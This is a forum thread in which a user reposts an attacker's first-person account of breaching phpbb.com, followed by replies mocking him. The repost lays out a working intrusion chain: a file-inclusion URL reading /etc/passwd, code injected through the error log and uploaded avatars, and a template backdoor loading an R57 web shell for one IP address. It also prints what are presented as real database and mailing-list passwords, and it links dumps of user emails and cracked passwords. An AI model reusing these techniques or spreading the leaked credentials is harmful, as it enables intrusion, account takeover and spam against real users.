Jump to content

PHPBB hacked?

waynew

By waynew
in Miscellaneous

 Share

Recommended Posts

waynew Advanced Member

waynew

Posted
Posted

Their site is down due to an attack (phpbb 3 not affected). Followed a few links and found the hackers blogspot, where he posted all about it: (Don't bother wasting your time trying to follow the majority of the links as they are dead).

 

It all started on Jan 14th when I was surfing milw0rm and came across this exploit: http://www.milw0rm.com/exploits/7778 I then remembered that phpbb.com was running PHPlist and went looking through my email to find the link to the script’s location. So I went to phpbb.com/lists and sure enough they were running a vulnerable version. Next I enabled my favorite program proxy program and tried http://www.phpbb.com/lists/admin/index.php?_SERVER%5bConfigFile%5d=../../../../../../etc/passwd and sure enough it included the etc/passwd

 

http://hackedphpbb.pastebin.com/f70f8bcaf

http://rapidshare.com/files/192159914/etc.txt

 

So I moved on to /etc/httpd/conf/httpd.conf

http://rapidshare.com/files/192163061/httpd.txt

http://hackedphpbb.pastebin.com/d29d8d4c7

 

And eventually found my way to their error log /home/logs/phpbb.com/error_log. After a little looking I figured out that their forums were running off /home/virtual/phpbb.com/community/ well it has been known for some time that you can include code in the error log. So I wanted to run some code, well in PHPBB3 the avatars are located in a folder called /home/virtual/phpbb.com/community/images/avatars/upload and your avatar is called (secret hash)_userid.jpg. But I didn’t know what the secret has was to include my picture (that had my own code in it) so by using the error log I injected code

And figured out that their hash is f51ee61fe7a83fdf72780912bced0855. So now every time I want to upload run code against the server I can include this: /../../../../../../home/virtual/phpbb.com/community/images/avatars/upload/f51ee61fe7a83fdf72780912bced0855_ID.jpg

 

So my first avatar was something simple and I wanted to see if phpbb kept their config file in plain text so cat /home/virtual/phpbb.com/community/config.php and sure enough, its in plain text.

$dbms = 'mysqli';

$dbhost = 'phpbb.db.osuosl.org';

$dbport = '';

$dbname = 'phpbb';

$dbuser = 'phpbb2';

$dbpasswd = 'saxM9nfRjLbJ2Yy5';

$table_prefix = 'community_';

 

While I was at it I checked out the config for PHPlist and it was also in plain text:

$database_host = "localhost";

$database_name = "phpbb_phplist";

$database_user = 'phplist';

$database_password = 'Berti3_Danc3';

 

So I started running commands and found out that I can upload a php text file on the forums and by finding where the path it was stored I was able to get around their 14kb restrictions on avatars and a lot easier than editing images with edjpgcom. So doing a mysql dump of the phplist_admin table it showed in plain text that the password for the one admin account was phpbb_n3ws and the login was phpBB. Wow I am shocked no one brute forced this. So I login and see what I can come across, wow 400,000 registered emails, I’m sure that will go quick on the black market, sorry people but expect a lot of spam. After trying to modify the files that were stored in PHPlist I gave up and moved on to the forums. But not before dumping the PHPlist emails here: http://rapidshare.com/files/192305758/out.txt

 

On the phpbb forums it states it has 200,000 members, but due to them constantly getting spammed they have well over 400,000 accounts. I started dumping the community_users table with their user_id, username and user_password. PHPBB stores their user’s passwords in unsalted md5 and their admin’s passwords in some funky hash. But if you run your own forum and are an admin you can have your forums create the hash, and then you do an mysql update to one of the admin account’s and your in. Or if you change their password to yours you can use the recover password function. More to come from this later.

 

So I wrote a script that submits via curl, the md5 hash to a website and then stores the successful result in my own mysql database. The total accounts cracked are: 28635. I could have continued cracking but it was getting boring. Here is a sql file of the cracked passwords. Warning, some of the user name’s aren’t right as I had to remove ticks and quotes for it to run in my script, so I included their user id so you can check their proper login name.

http://rapidshare.com/files/192304153/phpbb_users.sql

 

In gaining access to the admin panel of the forums, I was able to read staff forums and come across some interesting posts. I will share some with you.

 

List passwords:

TO try and make this easier, below is a list of the mailing list passwords I had, please update and add any others that you have

 

captcha-commits@lists.phpbb.com 54a946c47dd434b2

catdb-commits@lists.phpbb.com 6f543db8f086e11f

convertors-commits@lists.phpbb.com c192b68baacc8842

documentation-commits@lists.phpbb.com f85ffcdf9262420c

easymod-commits@lists.phpbb.com 5db5bf75be85191b

kbase-commits@lists.phpbb.com 7c843188ed2f6021

modteam-commits@lists.phpbb.com 533aeefe56bfa30c

prosilver-commits@lists.phpbb.com 859785a9cc724e03

website-commits@lists.phpbb.com 3c79b9864ae5ce43

phpbb-honey-commits@lists.phpbb.com 7e9563750650e4c4

st-tool-commits@lists.phpbb.com 534d4a9b74bb77aa

iit-track-commits@lists.phpbb.com 8f318ffd3a2067c8

packagemanager-commits@lists.phpbb.com 81657892dddafdca

moddocs-commits@lists.phpbb.com 85c837b7f78e5435

 

Told you they were random Meik ;)

 

edit by dhn: added website-commits

edit by tm: added phpbb-honey-commits, st--tool-commits, iit-track-commits.

 

8kg;rt7Xykjq

 

That password should work for all mailing lists on code.phpbb.com.

 

Emergency contacts and irc info:

http://hackedphpbb.pastebin.com/f1399b3e8

 

And then I remembered that the admin panel allows you to dump tables. So I dumped the users table which is accessible here:

http://rapidshare.com/files/192261517/backup_sql.gz

 

Next I enabled php in template files and added this bit of code to one of the templates:

$ip=$_SERVER['REMOTE_ADDR']; if($ip == "x.x.x.x"){include("/home/virtual/phpbb.com/community/files/(myid)_82ec9f9eb80df2a16cc3638429631c9f");}

 

Which happened to be a shell, R57shell actually. I then searched for a writable directory and created a php file and wrote the source code to that file. I cleaned up the template and settings and logs and left the forums to run the way they were.

 

After searching around using the shell I came across the Blog settings:

define('DB_NAME', 'wordpress'); // The name of the database

define('DB_USER', 'blog'); // Your MySQL username

define('DB_PASSWORD', 'htsCCvyCnt5jPYMx'); // ...and password

define('DB_HOST', 'localhost'); // 99% chance you won't need to change this value

define('DB_CHARSET', 'utf8');

define('DB_COLLATE', '');

 

And now it comes to an end, you may ask why did I do this? For fun mainly, but what I would like to suggest to the team at phpbb is this. If you are going to run third party scripts, either integrate them or keep up to date on their patches. (even though the patch wasn’t released for 2 weeks). Also don’t allow admin’s to recover their passwords, they should have to contact another admin. Another item, doesn’t keep plain text files of passwords or in the database plain text passwords.

 

I know this isn’t the best read, but it is very hard to look back on everything you did over the course of a few weeks. But hopefully I can now sleep better knowing that I am not worrying about the next way to break in.

 

-----------------------------------UPDATE

to all that same i am a script kiddie, fuck you

phpbb, i did not alter any files on your server, everything i gained access to has been listed in this blog

 

here are some updated links

http://pastebin.ca/1325249

http://pastebin.ca/1325250

http://pastebin.ca/1325251

http://rapidshare.com/files/192864547/doc.txt.html

Link to comment
Share on other sites
.josh Advanced Member

.josh

Posted
Posted

I vaguely recall having some version of phpbb on my server like 3 or 4 years ago.  It was just a test install to poke at the code, nothing anybody should have cared about, no registered users or nothin'.  I remember some tard used the exploit of the day to make himself an admin account and post how l33t he was and deleted all the current posts...read: 1 test post, lol.  I was just like, wtf, of all the places to crack, you pick some random test install, delete one stupid "test" post, and then brag about it?  I didn't even delete his admin account.  How can anybody that retarded by dangerous?  I let him hang around for a while and he started posting stupid stuff trying to be my friend I guess.  "So...what kind of music do you listen to?" etc... Eventually he got bored and left. 

Link to comment
Share on other sites
corbin Regular Member

corbin

Posted
Posted

"to all that same i am a script kiddie, fuck you"

 

 

He didn't exactly do anything impressive in my books....

 

 

But anyway, what a dick move.  I would understand having a little fun, but he didn't need to post all of the dumps and stuff.....

 

 

Kinda funny that such a big site was "hacked" so easily though.

 

 

 

 

(P.S.  To the people talking about PHPBB getting hacked before, the actual forum software wasn't hacked was it?  Just a third party component?)

Link to comment
Share on other sites
deadlyp99 Member

deadlyp99

Posted
Posted

erm... this guy was a damn noob.

OK, he calls out phpbb for not having updated their script.

He found the exploit january 14th. It was released... january 14th.

The time frame between them even knowing the vulnerability was made public and this noob finding it was within 24 hours.

 

OK... so not everyone can find out about a new exploit and deal with it within that time frame.

 

In my book, if you don't find the vulnerability yourself you didnt hack crap. He's just another skiddy trying to look cool on the internets.

Link to comment
Share on other sites
Mchl Regular Member

Mchl

Posted
Posted

There was a time, when my phpBB (2) installation was hacked every week... Coincidentaly, all the attacks seemed to be by Turks...

Once they posted hashed passwords to my RSS channel... man that was humiliating...

Link to comment
Share on other sites
This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.